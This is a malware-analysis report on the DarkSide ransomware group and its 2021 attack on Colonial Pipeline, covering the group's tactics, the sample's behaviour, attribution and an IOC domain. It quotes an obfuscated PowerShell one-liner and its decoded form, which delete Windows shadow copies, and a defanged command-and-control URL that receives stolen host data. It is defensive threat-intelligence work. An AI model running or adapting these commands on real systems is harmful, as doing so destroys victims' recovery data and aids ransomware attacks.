
Colonial Pipeline Attack: DarkSide Ransomware Analysis

DarkSide is an emerging RaaS (ransomware as a service) criminal group, possibly formed by former members of other ransomware operations. According to the attack rules the group previously announced, it only launches extortion attacks against organizations outside the medical, government, education, non-profit, and funeral and interment sectors. The ransomware family first appeared in August 2020; to date, 81 companies have been publicly attacked by it.


Attack

On April 20, 2021, the DarkSide group issued an announcement on its dark web site claiming that it had broken into many companies listed on Nasdaq and other stock exchanges and encrypted their core data. If the affected companies refuse to pay the ransom, the gang is prepared to publish the stolen data and profit from short-selling options on those companies.


On May 7, 2021, Colonial Pipeline, the largest fuel pipeline provider in the United States, encountered a targeted attack by the DarkSide group, forcing it to shut down the key fuel network that supplies fuel to the densely populated eastern states of the United States.


Technical

According to analysis of the DarkSide group's historical attack data, its attack characteristics differ from those of other ransomware groups: a large amount of data is stolen before the ransomware is deployed against the target organization. The group also built a distributed storage system in Iran that is used to store victim data.


Announcement from DarkSide Group on Storage System

The main attack features of the DarkSide gang:

o The ransomware mainly targets Windows systems, but variants targeting Linux systems also exist

o A large number of penetration testing tools are used to scan and break into the target organization's external network systems

o After gaining a foothold on the organization's intranet, the group attacks the Windows domain controller in an attempt to take control of the entire enterprise network

o The organization's stolen core data is uploaded to the group's private cloud distributed storage system

o After taking control of the organization's core assets, the ransomware is finally deployed

DarkSide's extortion notice is tailored to companies: it specifically targets accounting data, executive data, sales data, customer support data, marketing data, and other core business data for theft and extortion.


Ransomware analysis

When first launched, the DarkSide ransomware checks whether the current user is an administrator.

Once running, it drops an icon file into the AppData\Local directory, which is used as the icon for encrypted files. The icon's file name is also the extension appended to encrypted files (it differs per sample; in this sample it is ".82a71c82").


The virus collects the current user name, computer name and other host information, encrypts it, and sends it to its server. The URL observed during analysis is:

hxxp://securebestapp20.com/mhzPjMHjEl


It then calls the system PowerShell to execute a command:

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"


The loop rebuilds the command two hex characters at a time; the decoded string is the command that deletes the Windows Volume Shadow Copies, removing the system's local restore points:

Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

After the preparation work is completed, the virus starts two threads to encrypt files in a loop.


The ransomware encrypts the victim's data with the Salsa20 algorithm, then encrypts the Salsa20 key with RSA-1024 and appends the encrypted key to the end of each file.


Finally, the virus changes the user's desktop background and leaves a ransom note asking the victim to contact the attackers to pay the ransom.


Gang association and attribution analysis

DarkSide gang members once posted DarkSide-related ransomware information on well-known Russian forums.


The ransomware checks the system's default language; if it is Russian, files on the system are not encrypted.


Judging from its technical characteristics and historical activity taken together, the gang is a typical RaaS (ransomware as a service) criminal group and is suspected to consist largely of Russian-speaking members.

IOCs

securebestapp20.com
